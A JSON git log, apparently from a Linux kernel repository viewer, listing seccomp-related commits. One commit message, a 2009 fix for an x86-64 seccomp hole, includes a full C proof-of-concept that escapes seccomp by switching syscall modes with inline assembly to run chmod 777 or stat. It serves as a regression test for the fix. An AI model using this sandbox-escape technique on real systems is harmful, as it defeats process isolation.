)]}' { "log": [ { "commit": "5b1017404aea6d2e552e991b3fd814d839e9cd67", "tree": "8af3679beab1541d8c77afe28bc261196f03c083", "parents": [ "ccbe495caa5e604b04d5a31d7459a6f6a76a756c" ], "author": { "name": "Roland McGrath", "email": "roland@redhat.com", "time": "Fri Feb 27 23:25:54 2009 -0800" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@linux-foundation.org", "time": "Mon Mar 02 15:41:30 2009 -0800" }, "message": "x86-64: seccomp: fix 32/64 syscall hole\n\nOn x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with\nljmp, and then use the \"syscall\" instruction to make a 64-bit system\ncall. A 64-bit process make a 32-bit system call with int $0x80.\n\nIn both these cases under CONFIG_SECCOMP\u003dy, secure_computing() will use\nthe wrong system call number table. The fix is simple: test TS_COMPAT\ninstead of TIF_IA32. Here is an example exploit:\n\n\t/* test case for seccomp circumvention on x86-64\n\n\t There are two failure modes: compile with -m64 or compile with -m32.\n\n\t The -m64 case is the worst one, because it does \"chmod 777 .\" (could\n\t be any chmod call). The -m32 case demonstrates it was able to do\n\t stat(), which can glean information but not harm anything directly.\n\n\t A buggy kernel will let the test do something, print, and exit 1; a\n\t fixed kernel will make it exit with SIGKILL before it does anything.\n\t*/\n\n\t#define _GNU_SOURCE\n\t#include \u003cassert.h\u003e\n\t#include \u003cinttypes.h\u003e\n\t#include \u003cstdio.h\u003e\n\t#include \u003clinux/prctl.h\u003e\n\t#include \u003csys/stat.h\u003e\n\t#include \u003cunistd.h\u003e\n\t#include \u003casm/unistd.h\u003e\n\n\tint\n\tmain (int argc, char **argv)\n\t{\n\t char buf[100];\n\t static const char dot[] \u003d \".\";\n\t long ret;\n\t unsigned st[24];\n\n\t if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) !\u003d 0)\n\t perror (\"prctl(PR_SET_SECCOMP) -- not compiled into kernel?\");\n\n\t#ifdef __x86_64__\n\t assert ((uintptr_t) dot \u003c (1UL \u003c\u003c 32));\n\t asm (\"int $0x80 # %0 \u003c- %1(%2 %3)\"\n\t : \"\u003da\" (ret) : \"0\" (15), \"b\" (dot), \"c\" (0777));\n\t ret \u003d snprintf (buf, sizeof buf,\n\t\t\t \"result %ld (check mode on .!)\\n\", ret);\n\t#elif defined __i386__\n\t asm (\".code32\\n\"\n\t \"pushl %%cs\\n\"\n\t \"pushl $2f\\n\"\n\t \"ljmpl $0x33, $1f\\n\"\n\t \".code64\\n\"\n\t \"1: syscall # %0 \u003c- %1(%2 %3)\\n\"\n\t \"lretl\\n\"\n\t \".code32\\n\"\n\t \"2:\"\n\t : \"\u003da\" (ret) : \"0\" (4), \"D\" (dot), \"S\" (\u0026st));\n\t if (ret \u003d\u003d 0)\n\t ret \u003d snprintf (buf, sizeof buf,\n\t\t\t \"stat . -\u003e st_uid\u003d%u\\n\", st[7]);\n\t else\n\t ret \u003d snprintf (buf, sizeof buf, \"result %ld\\n\", ret);\n\t#else\n\t# error \"not this one\"\n\t#endif\n\n\t write (1, buf, ret);\n\n\t syscall (__NR_exit, 1);\n\t return 2;\n\t}\n\nSigned-off-by: Roland McGrath \u003croland@redhat.com\u003e\n[ I don\u0027t know if anybody actually uses seccomp, but it\u0027s enabled in\n at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n" }, { "commit": "cf99abace7e07dd8491e7093a9a9ef11d48838ed", "tree": "3b7cfd7c76c2c43e6ae3fdaaff3a50a752072424", "parents": [ "1d9d02feeee89e9132034d504c9a45eeaf618a3d" ], "author": { "name": "Andrea Arcangeli", "email": "andrea@cpushare.com", "time": "Sun Jul 15 23:41:33 2007 -0700" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@woody.linux-foundation.org", "time": "Mon Jul 16 09:05:50 2007 -0700" }, "message": "make seccomp zerocost in schedule\n\nThis follows a suggestion from Chuck Ebbert on how to make seccomp\nabsolutely zerocost in schedule too. The only remaining footprint of\nseccomp is in terms of the bzImage size that becomes a few bytes (perhaps\neven a few kbytes) larger, measure it if you care in the embedded.\n\nSigned-off-by: Andrea Arcangeli \u003candrea@cpushare.com\u003e\nCc: Andi Kleen \u003cak@suse.de\u003e\nSigned-off-by: Andrew Morton \u003cakpm@linux-foundation.org\u003e\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n" }, { "commit": "1d9d02feeee89e9132034d504c9a45eeaf618a3d", "tree": "a4324cce8acd77cace3b1d4cf3a1e61783707e5c", "parents": [ "be0ef957c9eed4ebae873ee3fbcfb9dfde486dec" ], "author": { "name": "Andrea Arcangeli", "email": "andrea@cpushare.com", "time": "Sun Jul 15 23:41:32 2007 -0700" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@woody.linux-foundation.org", "time": "Mon Jul 16 09:05:50 2007 -0700" }, "message": "move seccomp from /proc to a prctl\n\nThis reduces the memory footprint and it enforces that only the current\ntask can enable seccomp on itself (this is a requirement for a\nstrightforward [modulo preempt ;) ] TIF_NOTSC implementation).\n\nSigned-off-by: Andrea Arcangeli \u003candrea@cpushare.com\u003e\nSigned-off-by: Andrew Morton \u003cakpm@linux-foundation.org\u003e\nSigned-off-by: Linus Torvalds \u003ctorvalds@linux-foundation.org\u003e\n" }, { "commit": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2", "tree": "0bba044c4ce775e45a88a51686b5d9f90697ea9d", "parents": [], "author": { "name": "Linus Torvalds", "email": "torvalds@ppc970.osdl.org", "time": "Sat Apr 16 15:20:36 2005 -0700" }, "committer": { "name": "Linus Torvalds", "email": "torvalds@ppc970.osdl.org", "time": "Sat Apr 16 15:20:36 2005 -0700" }, "message": "Linux-2.6.12-rc2\n\nInitial git repository build. I\u0027m not bothering with the full history,\neven though we have it. We can create a separate \"historical\" git\narchive of that later if we want to, and in the meantime it\u0027s about\n3.2GB when imported into git - space that would just make the early\ngit days unnecessarily complicated, when we don\u0027t have a lot of good\ninfrastructure for it.\n\nLet it rip!\n" } ] }